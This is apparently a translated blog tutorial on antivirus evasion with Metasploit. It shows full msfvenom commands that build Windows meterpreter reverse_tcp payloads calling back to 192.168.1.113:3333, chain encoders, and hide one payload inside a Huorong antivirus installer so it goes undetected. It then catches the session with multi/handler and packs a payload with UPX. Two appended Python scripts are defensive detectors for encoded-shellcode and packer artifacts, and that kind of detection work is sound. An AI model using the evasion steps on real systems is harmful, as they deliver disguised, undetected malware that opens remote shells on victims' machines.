Preface
This article walks through creating payloads with Metasploit's standalone payload generator (msfvenom), and then encoding and packing those payloads so that they get past antivirus software.
I. AV evasion (免杀)
"免杀" literally means "avoid being killed": a generated payload may be killed by the antivirus on the target machine when it runs, so the goal is to use techniques that let the payload slip past the antivirus scan.
1. Using msfvenom
┌──(root💀kali)-[~]
└─# msfvenom info
Error: No options
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe
Options:
-l, --list <type> List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all
-p, --payload <payload> Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
--list-options List --payload <value>'s standard, advanced and evasion options
-f, --format <format> Output format (use --list formats to list)
-e, --encoder <encoder> The encoder to use (use --list encoders to list)
--service-name <value> The service name to use when generating a service binary
--sec-name <value> The new section name to use when generating large Windows binaries. Default: random 4-character alpha string
--smallest Generate the smallest possible payload using all available encoders
--encrypt <value> The type of encryption or encoding to apply to the shellcode (use --list encrypt to list)
--encrypt-key <value> A key to be used for --encrypt
--encrypt-iv <value> An initialization vector for --encrypt
-a, --arch <arch> The architecture to use for --payload and --encoders (use --list archs to list)
--platform <platform> The platform for --payload (use --list platforms to list)
-o, --out <path> Save the payload to a file
-b, --bad-chars <list> Characters to avoid example: '\x00\xff'
-n, --nopsled <length> Prepend a nopsled of [length] size on to the payload
--pad-nops Use nopsled size specified by -n <length> as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length)
-s, --space <length> The maximum size of the resulting payload
--encoder-space <length> The maximum size of the encoded payload (defaults to the -s value)
-i, --iterations <count> The number of times to encode the payload
-c, --add-code <path> Specify an additional win32 shellcode file to include
-x, --template <path> Specify a custom executable file to use as a template
-k, --keep Preserve the --template behaviour and inject the payload as a new thread
-v, --var-name <value> Specify a custom variable name to use for certain output formats
-t, --timeout <second> The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
-h, --help Show this message
A few of the parameters matter most:
- -p: which payload to use; all payloads can be listed with -l payloads
- -f: output format; elf for Linux, exe for Windows
- -o: output file name
- -e: the encoder to use; all encoders can be listed with -l encoders
- -i: number of encoding iterations
- -a: the target's instruction-set architecture; x86 is fine here
- --platform: the target platform, windows here; the platforms msfvenom supports can be listed with --help-platforms (the help output above calls this --list platforms)
- -k: keep the template's original functionality and inject the payload as a new thread; this is not guaranteed to work with every executable
- -x: the template executable
For example, create a Windows reverse-connect meterpreter payload:
┌──(root💀kali)-[~]
└─# msfvenom -p windows/meterpreter/reverse_tcp lhosts=192.168.1.113 lport=3333 -e cmd/echo -i 10 -f exe -o cmd_echo_113_3333_10.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 10 iterations of cmd/echo
cmd/echo succeeded with size 354 (iteration=0)
cmd/echo succeeded with size 354 (iteration=1)
cmd/echo succeeded with size 354 (iteration=2)
cmd/echo succeeded with size 354 (iteration=3)
cmd/echo succeeded with size 354 (iteration=4)
cmd/echo succeeded with size 354 (iteration=5)
cmd/echo succeeded with size 354 (iteration=6)
cmd/echo succeeded with size 354 (iteration=7)
cmd/echo succeeded with size 354 (iteration=8)
cmd/echo succeeded with size 354 (iteration=9)
cmd/echo chosen with final size 354
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Saved as: cmd_echo_113_3333_10.exe
-p selects the windows/meterpreter/reverse_tcp payload, lhosts=192.168.1.113 lport=3333 give the listening IP and port on the attacking host, -e cmd/echo selects the encoder, and -i 10 encodes the payload 10 times.
Scanning it with Huorong Security (火绒), it is easily detected.
2. Multi-layer encoding
┌──(root💀kali)-[~]
└─# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 LHOST=192.168.1.113 LPORT=3333 -f raw | msfvenom -a x86 --platform windows -e x86/alpha_upper -i 10 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 10 -f exe -o payload2.0.exe
Attempting to read payload from STDIN...
Attempting to read payload from STDIN...
Found 1 compatible encoders
Attempting to encode payload with 20 iterations of x86/shikata_ga_nai
...
x86/shikata_ga_nai chosen with final size 894
Payload size: 894 bytes
Found 1 compatible encoders
Attempting to encode payload with 10 iterations of x86/alpha_upper
...
Found 1 compatible encoders
Attempting to encode payload with 10 iterations of x86/countdown
...
x86/countdown chosen with final size 161
Payload size: 161 bytes
Final size of exe file: 73802 bytes
Saved as: payload2.0.exe
x86/alpha_upper succeeded with size 985271 (iteration=9)
x86/alpha_upper chosen with final size 985271
Payload size: 985271 bytes
Here pipes chain msfvenom so that the payload is encoded in several layers: 20 iterations of shikata_ga_nai first, then 10 of alpha_upper, then 10 of countdown, and only then is the executable produced. This one is detected as well.
Using a template
The first stages are unchanged; this time the last stage uses a Huorong installer as the template.
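The encoders above rewrite the payload bytes on disk but leave a small decoder stub in front of them, and that stub, plus the shape of the encoded data, is what static scanners key on; this is part of why both encoded files were still detected. As an added example (not from the original post, and not part of Metasploit), the following Python scanner applies a few such heuristics a defender can run over a dropped file or a memory dump: a NOP sled like the one -n/--nopsled prepends, the fnstenv [esp-0xc] GetPC idiom used by shikata_ga_nai's decoder stub, the call $+5 / pop GetPC idiom, and long uppercase alphanumeric runs of the kind x86/alpha_upper emits. The heuristic names, the thresholds (16 NOPs, 64 alphanumerics) and the sample bytes are my own constructions; every one of these patterns also occurs in benign data, so hits are triage signals to be confirmed, not verdicts.

```python
import re

# Static triage heuristics for encoded-shellcode artifacts (assumed patterns, not msfvenom's).
# fnstenv [esp-0xc] encodes as D9 74 24 F4: the GetPC idiom in shikata_ga_nai's decoder stub.
FNSTENV_GETPC = re.compile(rb"\xd9\x74\x24\xf4")
# call $+5 followed by pop reg (E8 00 00 00 00, then 58..5F): another classic GetPC idiom.
CALL_POP_GETPC = re.compile(rb"\xe8\x00\x00\x00\x00[\x58-\x5f]")
# A run of 16 or more NOPs (0x90), the shape msfvenom's -n/--nopsled prepends.
NOP_SLED = re.compile(rb"\x90{16,}")
# 64 or more uppercase alphanumerics in a row, the shape of x86/alpha_upper output.
UPPER_ALNUM_RUN = re.compile(rb"[A-Z0-9]{64,}")

HEURISTICS = [
    ("nop-sled", NOP_SLED),
    ("fnstenv-getpc", FNSTENV_GETPC),
    ("call-pop-getpc", CALL_POP_GETPC),
    ("upper-alnum-run", UPPER_ALNUM_RUN),
]


def scan_blob(data: bytes):
    """Return (heuristic, offset, length) for the first hit of each heuristic, in HEURISTICS order."""
    hits = []
    for name, pattern in HEURISTICS:
        match = pattern.search(data)
        if match:
            hits.append((name, match.start(), match.end() - match.start()))
    return hits


def scan_file(path):
    """Convenience wrapper: scan a file on disk."""
    with open(path, "rb") as fh:
        return scan_blob(fh.read())


# Constructed sample (not real msfvenom output): 32 NOPs, then a stub shaped like
# "fldz; fnstenv [esp-0xc]; pop ebx", then 100 bytes of uppercase alphanumerics, then padding.
SAMPLE = b"\x90" * 32 + b"\xd9\xee\xd9\x74\x24\xf4\x5b" + b"VTX30" * 20 + b"\xcc" * 8
# Constructed benign sample: some text plus every byte value exactly once, so no long runs.
BENIGN = b"hello, world\n" + bytes(range(256))

if __name__ == "__main__":
    for hit in scan_blob(SAMPLE):
        print("%-16s offset=%-4d length=%d" % hit)
```

On the constructed SAMPLE the scanner reports the NOP sled at offset 0, the fnstenv idiom at offset 34 and a 100-byte alphanumeric run at offset 39, while BENIGN produces no hits. Because these patterns describe the decoder, not the payload, they survive any number of -i iterations; that is the practical lesson of the "still detected" results above.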
┌──(root💀kali)-[~]
└─# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 LHOST=192.168.1.113 LPORT=3333 -f raw | msfvenom -a x86 --platform windows -e x86/alpha_upper -i 10 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 10 -x /root/桌面/sysdiag-full-5.0.61.1-20210605.exe -k -f exe > payload3.exe
With the template, the payload is no longer detected. Nice!
Running the payload brings up the Huorong installer's setup screen, and the handler (multi/handler) on the attacking host receives a connection from the target machine.
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > setg payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > setg lhost 192.168.1.113
msf6 exploit(multi/handler) > set lport 3333
lport => 3333
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.1.113:3333
[*] Sending stage (175174 bytes) to 192.168.1.106
[*] Meterpreter session 1 opened (192.168.1.113:3333 -> 192.168.1.106:1682) at 2021-06-06 12:58:24 +0800
meterpreter > background
[*] Backgrounding session 1...
II. Packing (加壳)
A packer is a tool that compresses (and encrypts) an executable and embeds the decompression code inside it; when the packed file is run, that code rebuilds the original program from the compressed data and then runs it.
1. Using upx
┌──(root💀kali)-[~]
└─# upx
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2020
UPX 3.96 Markus Oberhumer, Laszlo Molnar & John Reiser Jan 23rd 2020
Usage: upx [-123456789dlthVL] [-qvfk] [-o file] file..
Commands:
-1 compress faster -9 compress better
-d decompress -l list compressed file
-t test compressed file -V display version number
-h give more help -L display software license
Options:
-q be quiet -v be verbose
-oFILE write output to 'FILE'
-f force compression of suspicious files
-k keep backup files
file.. executables to (de)compress
Type 'upx --help' for more detailed help.
UPX comes with ABSOLUTELY NO WARRANTY; for details visit https://upx.github.io
First pack the file with -5:
┌──(root💀kali)-[~]
└─# upx -5 payload2.0.exe
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2020
UPX 3.96 Markus Oberhumer, Laszlo Molnar & John Reiser Jan 23rd 2020
File size Ratio Format Name
-------------------- ------ ----------- -----------
73802 -> 48128 65.21% win32/pe payload2.0.exe
Packed 1 file.
After packing the second-generation payload2.exe and testing it, I found that it is still detected, but the time taken to detect it and the detection count both increase noticeably.
Summary
This article has covered the use of msfvenom and the process of encoding a payload to evade detection and packing it; it is for study purposes only.
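UPX packing changes a file in ways that are easy to see without running it, which is one reason a packed payload is still flagged: the section names become UPX0/UPX1, those sections are typically marked both writable and executable, and the packed section's contents are close to random (high entropy). The following Python triage script is an added example, not part of the original post nor of UPX or Metasploit: it parses the PE section table by hand, scores each section's Shannon entropy, and flags UPX section names, writable-and-executable sections, and non-standard section names (the kind of added section the --sec-name help text above describes, with its random 4-character default). The 7.0 bits-per-byte threshold and the finding labels are my assumptions, and the sample images are constructed by build_pe rather than taken from real files.

```python
import math
import random
import struct

# PE section characteristic flags (PE/COFF specification)
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

UPX_SECTION_NAMES = {"UPX0", "UPX1", "UPX2"}          # names UPX writes by default
COMMON_SECTION_NAMES = {".text", ".data", ".rdata", ".idata", ".edata",
                        ".rsrc", ".reloc", ".bss", ".tls", ".pdata"}
HIGH_ENTROPY_BITS = 7.0   # assumed threshold; compressed or encrypted data approaches 8.0


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for a single repeated value, ~8.0 for random bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes):
    """Walk DOS header -> PE signature -> COFF header -> section table.
    Returns [(name, raw_bytes, characteristics)]; raises ValueError for non-PE input."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_header_size = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + opt_header_size          # section table follows the optional header
    sections = []
    for i in range(num_sections):
        (name, _vsize, _vaddr, raw_size, raw_ptr,
         _, _, _, _, chars) = struct.unpack_from("<8sIIIIIIHHI", pe, table + 40 * i)
        name = name.rstrip(b"\0").decode("ascii", "replace")
        sections.append((name, pe[raw_ptr:raw_ptr + raw_size], chars))
    return sections


def triage(pe: bytes):
    """Packer / added-section heuristics; returns [(section_name, reason)] in file order."""
    findings = []
    for name, raw, chars in parse_sections(pe):
        if name in UPX_SECTION_NAMES:
            findings.append((name, "upx-section-name"))
        elif name not in COMMON_SECTION_NAMES:
            findings.append((name, "nonstandard-section-name"))
        if chars & IMAGE_SCN_MEM_EXECUTE and chars & IMAGE_SCN_MEM_WRITE:
            findings.append((name, "writable-and-executable"))
        if raw and shannon_entropy(raw) > HIGH_ENTROPY_BITS:
            findings.append((name, "high-entropy"))
    return findings


def triage_file(path):
    with open(path, "rb") as fh:
        return triage(fh.read())


def build_pe(sections):
    """Construct a minimal PE32 image for testing (constructed input, not a runnable program).
    sections: [(name, raw_bytes, characteristics)]."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                     # e_lfanew -> right after DOS header
    opt = b"\x0b\x01" + b"\0" * 222                           # PE32 magic, remaining fields zeroed
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, len(opt), 0x0102)
    raw_ptr = 64 + 4 + len(coff) + len(opt) + 40 * len(sections)
    table, body, vaddr = b"", b"", 0x1000
    for name, data, chars in sections:
        table += struct.pack("<8sIIIIIIHHI", name.encode("ascii"), len(data), vaddr,
                             len(data), raw_ptr, 0, 0, 0, 0, chars)
        body += data
        raw_ptr += len(data)
        vaddr += 0x1000
    return bytes(dos) + b"PE\0\0" + coff + opt + table + body


RWX = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE


def upx_like_sample():
    """Constructed image laid out like a UPX-packed file: an empty RWX UPX0, an RWX UPX1
    full of pseudo-random bytes (standing in for compressed code) and a plain .rsrc."""
    rng = random.Random(7)
    packed = bytes(rng.getrandbits(8) for _ in range(4096))
    return build_pe([("UPX0", b"", RWX), ("UPX1", packed, RWX),
                     (".rsrc", b"\0" * 512, IMAGE_SCN_MEM_READ)])


def plain_sample():
    """Constructed image with one ordinary read+execute .text section of NOPs."""
    return build_pe([(".text", b"\x90" * 256, IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE)])


if __name__ == "__main__":
    for section, reason in triage(upx_like_sample()):
        print(section, reason)
```

Run against upx_like_sample() the script reports the UPX names and RWX flags on both UPX sections and high entropy on UPX1, while plain_sample() yields nothing. The same entropy check is also what makes the "compressed 73802 -> 48128 bytes" result above visible without UPX's own section names: an unpacker that renames sections still has to store near-random data somewhere.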